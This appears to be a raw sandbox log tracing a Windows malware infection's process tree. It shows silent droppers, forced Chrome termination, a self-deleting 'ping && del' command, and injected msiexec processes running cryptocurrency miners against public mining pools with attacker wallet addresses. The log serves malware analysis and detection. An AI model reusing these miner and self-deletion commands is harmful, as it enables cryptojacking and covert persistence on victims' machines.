C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5zh0n1is.wuu\md6_6ydj.exe & exit7⤵PID:6992
-
C:\Users\Admin\AppData\Local\Temp\5zh0n1is.wuu\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\5zh0n1is.wuu\md6_6ydj.exe8⤵PID:6368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bsnrc4wj.r34\askinstall31.exe & exit7⤵PID:6596
-
C:\Users\Admin\AppData\Local\Temp\bsnrc4wj.r34\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\bsnrc4wj.r34\askinstall31.exe8⤵PID:7160
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:7548
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:7760
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\exgqaq1e.mkn\toolspab1.exe & exit7⤵PID:6644
-
C:\Users\Admin\AppData\Local\Temp\exgqaq1e.mkn\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\exgqaq1e.mkn\toolspab1.exe8⤵PID:6124
-
C:\Users\Admin\AppData\Local\Temp\exgqaq1e.mkn\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\exgqaq1e.mkn\toolspab1.exe9⤵PID:6648
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yytgrcql.r14\setup_10.2_mix.exe & exit7⤵PID:7984
-
C:\Users\Admin\AppData\Local\Temp\yytgrcql.r14\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\yytgrcql.r14\setup_10.2_mix.exe8⤵PID:1020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qmrcxznb.jpz\GcleanerWW.exe /mixone & exit7⤵PID:7440
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1pejod1k.mwf\app.exe /8-2222 & exit7⤵PID:3268
-
C:\Users\Admin\AppData\Local\Temp\1pejod1k.mwf\app.exeC:\Users\Admin\AppData\Local\Temp\1pejod1k.mwf\app.exe /8-22228⤵PID:7212
-
C:\Users\Admin\AppData\Local\Temp\1pejod1k.mwf\app.exe"C:\Users\Admin\AppData\Local\Temp\1pejod1k.mwf\app.exe" /8-22229⤵PID:6276
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ytfofvc0.bw3\file.exe & exit7⤵PID:7188
-
C:\Users\Admin\AppData\Local\Temp\ytfofvc0.bw3\file.exeC:\Users\Admin\AppData\Local\Temp\ytfofvc0.bw3\file.exe8⤵PID:7716
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"9⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\VT1VV9M4V7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VT1VV9M4V7\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:4900
-
C:\Users\Admin\AppData\Local\Temp\VT1VV9M4V7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VT1VV9M4V7\multitimer.exe" 1 3.1617398124.6067896c348ab 10111⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\VT1VV9M4V7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VT1VV9M4V7\multitimer.exe" 2 3.1617398124.6067896c348ab12⤵PID:6448
-
C:\Users\Admin\AppData\Local\Temp\lzoxstdaetw\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\lzoxstdaetw\Setup3310.exe" /Verysilent /subid=57713⤵PID:6320
-
C:\Users\Admin\AppData\Local\Temp\is-8DN1A.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-8DN1A.tmp\Setup3310.tmp" /SL5="$20732,138429,56832,C:\Users\Admin\AppData\Local\Temp\lzoxstdaetw\Setup3310.exe" /Verysilent /subid=57714⤵PID:8820
-
-
-
C:\Users\Admin\AppData\Local\Temp\2yf0xog5lti\axso3b2mybo.exe"C:\Users\Admin\AppData\Local\Temp\2yf0xog5lti\axso3b2mybo.exe" /ustwo INSTALL13⤵PID:6044
-
-
C:\Users\Admin\AppData\Local\Temp\ooebu5m50rl\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ooebu5m50rl\cpyrix.exe" /VERYSILENT13⤵PID:8504
-
-
C:\Users\Admin\AppData\Local\Temp\jbe1hznrfcp\vict.exe"C:\Users\Admin\AppData\Local\Temp\jbe1hznrfcp\vict.exe" /VERYSILENT /id=53513⤵PID:8660
-
C:\Users\Admin\AppData\Local\Temp\is-8MTFM.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-8MTFM.tmp\vict.tmp" /SL5="$3071C,870426,780800,C:\Users\Admin\AppData\Local\Temp\jbe1hznrfcp\vict.exe" /VERYSILENT /id=53514⤵PID:8828
-
-
-
C:\Users\Admin\AppData\Local\Temp\21o3ibeltqr\app.exe"C:\Users\Admin\AppData\Local\Temp\21o3ibeltqr\app.exe" /8-2313⤵PID:8700
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\HPIGVV6MTL\setups.exe"C:\Users\Admin\AppData\Local\Temp\HPIGVV6MTL\setups.exe" ll10⤵PID:584
-
C:\Users\Admin\AppData\Local\Temp\is-M6451.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-M6451.tmp\setups.tmp" /SL5="$106D4,635399,250368,C:\Users\Admin\AppData\Local\Temp\HPIGVV6MTL\setups.exe" ll11⤵PID:6812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"9⤵PID:7792
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:8004
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:5164
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"9⤵PID:7884
-
C:\Users\Admin\AppData\Roaming\5E3F.tmp.exe"C:\Users\Admin\AppData\Roaming\5E3F.tmp.exe"10⤵PID:852
-
C:\Users\Admin\AppData\Roaming\5E3F.tmp.exe"C:\Users\Admin\AppData\Roaming\5E3F.tmp.exe"11⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Roaming\6B11.tmp.exe"C:\Users\Admin\AppData\Roaming\6B11.tmp.exe"10⤵PID:8176
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:7356
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:3496
-
-
-
C:\Users\Admin\AppData\Roaming\6E6E.tmp.exe"C:\Users\Admin\AppData\Roaming\6E6E.tmp.exe"10⤵PID:5536
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"10⤵PID:8420
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oo014ij5.fnf\Four.exe & exit7⤵PID:6232
-
C:\Users\Admin\AppData\Local\Temp\oo014ij5.fnf\Four.exeC:\Users\Admin\AppData\Local\Temp\oo014ij5.fnf\Four.exe8⤵PID:2060
-
C:\Users\Admin\AppData\Local\Temp\JTUS7ZRS54\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JTUS7ZRS54\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\JTUS7ZRS54\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JTUS7ZRS54\multitimer.exe" 1 3.1617398123.6067896bdbd2f 10410⤵PID:7560
-
C:\Users\Admin\AppData\Local\Temp\JTUS7ZRS54\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\JTUS7ZRS54\multitimer.exe" 2 3.1617398123.6067896bdbd2f11⤵PID:2496
-
C:\Users\Admin\AppData\Local\Temp\j1atimvvmv1\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\j1atimvvmv1\Setup3310.exe" /Verysilent /subid=57712⤵PID:7072
-
C:\Users\Admin\AppData\Local\Temp\is-99J1H.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-99J1H.tmp\Setup3310.tmp" /SL5="$60730,138429,56832,C:\Users\Admin\AppData\Local\Temp\j1atimvvmv1\Setup3310.exe" /Verysilent /subid=57713⤵PID:8812
-
-
-
C:\Users\Admin\AppData\Local\Temp\3bsq3rmbwai\vict.exe"C:\Users\Admin\AppData\Local\Temp\3bsq3rmbwai\vict.exe" /VERYSILENT /id=53512⤵PID:8628
-
C:\Users\Admin\AppData\Local\Temp\is-26HEC.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-26HEC.tmp\vict.tmp" /SL5="$7032C,870426,780800,C:\Users\Admin\AppData\Local\Temp\3bsq3rmbwai\vict.exe" /VERYSILENT /id=53513⤵PID:9060
-
-
-
C:\Users\Admin\AppData\Local\Temp\w2lnttfu4m4\app.exe"C:\Users\Admin\AppData\Local\Temp\w2lnttfu4m4\app.exe" /8-2312⤵PID:9052
-
-
C:\Users\Admin\AppData\Local\Temp\insnrgipptt\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\insnrgipptt\cpyrix.exe" /VERYSILENT12⤵PID:9044
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\96D5O3W8F7\setups.exe"C:\Users\Admin\AppData\Local\Temp\96D5O3W8F7\setups.exe" ll9⤵PID:6264
-
C:\Users\Admin\AppData\Local\Temp\is-47L05.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-47L05.tmp\setups.tmp" /SL5="$3067E,635399,250368,C:\Users\Admin\AppData\Local\Temp\96D5O3W8F7\setups.exe" ll10⤵PID:7620
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:5672
-
C:\Users\Admin\AppData\Local\Temp\is-23QFA.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-23QFA.tmp\lylal220.tmp" /SL5="$20300,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵PID:5776
-
C:\Users\Admin\AppData\Local\Temp\is-3TR06.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-3TR06.tmp\Microsoft.exe" /S /UID=lylal2205⤵PID:4324
-
C:\Program Files\Windows Defender\VRGKDQOCMM\irecord.exe"C:\Program Files\Windows Defender\VRGKDQOCMM\irecord.exe" /VERYSILENT6⤵PID:4452
-
C:\Users\Admin\AppData\Local\Temp\is-0FUFT.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-0FUFT.tmp\irecord.tmp" /SL5="$601E4,6265333,408064,C:\Program Files\Windows Defender\VRGKDQOCMM\irecord.exe" /VERYSILENT7⤵PID:2616
-
-
-
C:\Users\Admin\AppData\Local\Temp\07-cd3be-d73-0edbe-c9a7416646ef3\Fulodilaeky.exe"C:\Users\Admin\AppData\Local\Temp\07-cd3be-d73-0edbe-c9a7416646ef3\Fulodilaeky.exe"6⤵PID:4344
-
-
C:\Users\Admin\AppData\Local\Temp\4c-97190-e57-9aea8-03327697f2d09\Kaexygymaeco.exe"C:\Users\Admin\AppData\Local\Temp\4c-97190-e57-9aea8-03327697f2d09\Kaexygymaeco.exe"6⤵PID:5128
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ygfevjny.yt4\md6_6ydj.exe & exit7⤵PID:6164
-
C:\Users\Admin\AppData\Local\Temp\ygfevjny.yt4\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\ygfevjny.yt4\md6_6ydj.exe8⤵PID:6504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22t220ij.mls\askinstall31.exe & exit7⤵PID:6724
-
C:\Users\Admin\AppData\Local\Temp\22t220ij.mls\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\22t220ij.mls\askinstall31.exe8⤵PID:6440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3gfxe0vz.bd5\toolspab1.exe & exit7⤵PID:6736
-
C:\Users\Admin\AppData\Local\Temp\3gfxe0vz.bd5\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\3gfxe0vz.bd5\toolspab1.exe8⤵PID:6564
-
C:\Users\Admin\AppData\Local\Temp\3gfxe0vz.bd5\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\3gfxe0vz.bd5\toolspab1.exe9⤵PID:1300
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\usrrigvm.nno\setup_10.2_mix.exe & exit7⤵PID:7752
-
C:\Users\Admin\AppData\Local\Temp\usrrigvm.nno\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\usrrigvm.nno\setup_10.2_mix.exe8⤵PID:7288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ziexvnk.p3r\GcleanerWW.exe /mixone & exit7⤵PID:7536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ih5gwyyz.tr0\app.exe /8-2222 & exit7⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\ih5gwyyz.tr0\app.exeC:\Users\Admin\AppData\Local\Temp\ih5gwyyz.tr0\app.exe /8-22228⤵PID:6560
-
C:\Users\Admin\AppData\Local\Temp\ih5gwyyz.tr0\app.exe"C:\Users\Admin\AppData\Local\Temp\ih5gwyyz.tr0\app.exe" /8-22229⤵PID:8848
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v5nhjtal.cer\file.exe & exit7⤵PID:7436
-
C:\Users\Admin\AppData\Local\Temp\v5nhjtal.cer\file.exeC:\Users\Admin\AppData\Local\Temp\v5nhjtal.cer\file.exe8⤵PID:7352
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"9⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\52BDSDPXU0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\52BDSDPXU0\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\52BDSDPXU0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\52BDSDPXU0\multitimer.exe" 1 3.1617398142.6067897eb5e89 10111⤵PID:6040
-
C:\Users\Admin\AppData\Local\Temp\52BDSDPXU0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\52BDSDPXU0\multitimer.exe" 2 3.1617398142.6067897eb5e8912⤵PID:6696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LZ49BY49PV\setups.exe"C:\Users\Admin\AppData\Local\Temp\LZ49BY49PV\setups.exe" ll10⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\is-6PVKP.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-6PVKP.tmp\setups.tmp" /SL5="$5044C,635399,250368,C:\Users\Admin\AppData\Local\Temp\LZ49BY49PV\setups.exe" ll11⤵PID:5436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"9⤵PID:4616
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:784
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:1060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"9⤵PID:7576
-
C:\Users\Admin\AppData\Roaming\8223.tmp.exe"C:\Users\Admin\AppData\Roaming\8223.tmp.exe"10⤵PID:7616
-
C:\Users\Admin\AppData\Roaming\8223.tmp.exe"C:\Users\Admin\AppData\Roaming\8223.tmp.exe"11⤵PID:8640
-
-
-
C:\Users\Admin\AppData\Roaming\862B.tmp.exe"C:\Users\Admin\AppData\Roaming\862B.tmp.exe"10⤵PID:6468
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:7108
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:8376
-
-
-
C:\Users\Admin\AppData\Roaming\8F73.tmp.exe"C:\Users\Admin\AppData\Roaming\8F73.tmp.exe"10⤵PID:3984
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"9⤵PID:8756
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nc2ewopg.tj5\Four.exe & exit7⤵PID:7324
-
C:\Users\Admin\AppData\Local\Temp\nc2ewopg.tj5\Four.exeC:\Users\Admin\AppData\Local\Temp\nc2ewopg.tj5\Four.exe8⤵PID:5320
-
C:\Users\Admin\AppData\Local\Temp\MYDCXVEU1C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MYDCXVEU1C\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\MYDCXVEU1C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MYDCXVEU1C\multitimer.exe" 1 3.1617398133.606789752db51 10410⤵PID:5364
-
C:\Users\Admin\AppData\Local\Temp\MYDCXVEU1C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MYDCXVEU1C\multitimer.exe" 2 3.1617398133.606789752db5111⤵PID:5204
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ZD7OWI1SOG\setups.exe"C:\Users\Admin\AppData\Local\Temp\ZD7OWI1SOG\setups.exe" ll9⤵PID:5548
-
C:\Users\Admin\AppData\Local\Temp\is-D29D6.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-D29D6.tmp\setups.tmp" /SL5="$206F8,635399,250368,C:\Users\Admin\AppData\Local\Temp\ZD7OWI1SOG\setups.exe" ll10⤵PID:7504
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:2680
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:2484
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵PID:3372
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:2144
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:5444
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵PID:856
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"3⤵PID:4572
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:2960
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"3⤵PID:2412
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"4⤵PID:5520
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"5⤵PID:4208
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"6⤵PID:7568
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui6⤵PID:3400
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe7⤵PID:4596
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 5520 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"5⤵PID:7312
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 55206⤵
- Kills process with taskkill
PID:7724
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵PID:5064
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\GQ4EOT7CBW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GQ4EOT7CBW\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\GQ4EOT7CBW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GQ4EOT7CBW\multitimer.exe" 1 3.1617397973.606788d575f22 1035⤵PID:2132
-
C:\Users\Admin\AppData\Local\Temp\GQ4EOT7CBW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GQ4EOT7CBW\multitimer.exe" 2 3.1617397973.606788d575f226⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\dmutmgwjphu\vict.exe"C:\Users\Admin\AppData\Local\Temp\dmutmgwjphu\vict.exe" /VERYSILENT /id=5357⤵PID:6568
-
C:\Users\Admin\AppData\Local\Temp\is-TM03U.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-TM03U.tmp\vict.tmp" /SL5="$30432,870426,780800,C:\Users\Admin\AppData\Local\Temp\dmutmgwjphu\vict.exe" /VERYSILENT /id=5358⤵PID:6788
-
C:\Users\Admin\AppData\Local\Temp\is-GQTIE.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-GQTIE.tmp\win1host.exe" 5359⤵PID:6680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dkpepikdhce\vpn.exe"C:\Users\Admin\AppData\Local\Temp\dkpepikdhce\vpn.exe" /silent /subid=4827⤵PID:6612
-
C:\Users\Admin\AppData\Local\Temp\is-VU6LV.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-VU6LV.tmp\vpn.tmp" /SL5="$4040A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\dkpepikdhce\vpn.exe" /silent /subid=4828⤵PID:6752
-
-
-
C:\Users\Admin\AppData\Local\Temp\hvankd2nsp3\app.exe"C:\Users\Admin\AppData\Local\Temp\hvankd2nsp3\app.exe" /8-237⤵PID:6624
-
C:\Users\Admin\AppData\Local\Temp\hvankd2nsp3\app.exe"C:\Users\Admin\AppData\Local\Temp\hvankd2nsp3\app.exe" /8-238⤵PID:7532
-
-
-
C:\Users\Admin\AppData\Local\Temp\olfsj021rwy\xwqpuutr2f5.exe"C:\Users\Admin\AppData\Local\Temp\olfsj021rwy\xwqpuutr2f5.exe" /ustwo INSTALL7⤵PID:6656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 6528⤵
- Program crash
PID:5644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 6688⤵
- Program crash
PID:6796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 6728⤵
- Program crash
PID:5496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 6648⤵
- Program crash
PID:4480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 8848⤵
- Program crash
PID:7020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 9048⤵
- Program crash
PID:6828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 9208⤵
- Program crash
PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\cafrhmyoljf\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\cafrhmyoljf\cpyrix.exe" /VERYSILENT7⤵PID:6632
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:6216
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"9⤵PID:6852
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:6372
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"9⤵PID:6632
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub9⤵PID:7996
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe10⤵PID:6840
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yqkn05vddmd\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\yqkn05vddmd\Setup3310.exe" /Verysilent /subid=5777⤵PID:6972
-
C:\Users\Admin\AppData\Local\Temp\is-B2RAB.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-B2RAB.tmp\Setup3310.tmp" /SL5="$104DA,138429,56832,C:\Users\Admin\AppData\Local\Temp\yqkn05vddmd\Setup3310.exe" /Verysilent /subid=5778⤵PID:7076
-
C:\Users\Admin\AppData\Local\Temp\is-TVTNA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TVTNA.tmp\Setup.exe" /Verysilent9⤵PID:6180
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8J9CMRSQI9\setups.exe"C:\Users\Admin\AppData\Local\Temp\8J9CMRSQI9\setups.exe" ll4⤵PID:5288
-
C:\Users\Admin\AppData\Local\Temp\is-DDGNB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-DDGNB.tmp\setups.tmp" /SL5="$402BA,635399,250368,C:\Users\Admin\AppData\Local\Temp\8J9CMRSQI9\setups.exe" ll5⤵PID:2744
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:5056
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-E0QG4.tmp\aggc3hme5i5.tmp"C:\Users\Admin\AppData\Local\Temp\is-E0QG4.tmp\aggc3hme5i5.tmp" /SL5="$202D0,2592217,780800,C:\Users\Admin\AppData\Local\Temp\p5cd5v5rcaf\aggc3hme5i5.exe" /VERYSILENT1⤵PID:4400
-
